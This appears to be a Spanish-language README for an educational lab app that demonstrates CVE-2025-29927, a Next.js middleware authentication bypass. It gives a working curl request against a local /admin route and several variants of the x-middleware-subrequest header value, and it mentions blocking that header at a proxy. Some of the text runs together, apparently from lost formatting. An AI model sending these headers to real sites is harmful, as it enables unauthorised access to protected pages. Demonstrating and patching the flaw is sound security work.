
🔓 Next.js Auth Bypass Demo - Aplicación educativa que demuestra la vulnerabilidad de omisión de autenticación de middleware CVE-2025-29927. ⚠️ Solo para uso educativo. [Hecho usando IA]
Una aplicación simple de prueba de concepto Next.js 12.2.
npm install
npm run dev
La aplicación estará disponible en http://localhost:3000
npm run dev - Iniciar servidor de desarrollonpm run build - Compilar para producciónnpm run start - Iniciar servidor de producciónEdita pages/index.js para modificar la página de Hola Mundo. La aplicación usa estilos en línea por simplicidad, pero puedes agregar archivos CSS o librerías de estilos según sea necesario.
Esta aplicación demuestra la vulnerabilidad CVE-2025-29927 descubierta por Rachid.A (zhero) y Yasser Allam (inzo_):
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest a nivel de proxy/CDN⚠️ ADVERTENCIA: ¡Esto demuestra un CVE real solo con fines educativos!
Esta aplicación usa estilos en línea por simplicidad. Para una aplicación en producción, considera usar:
¡Feliz codificación! 🚀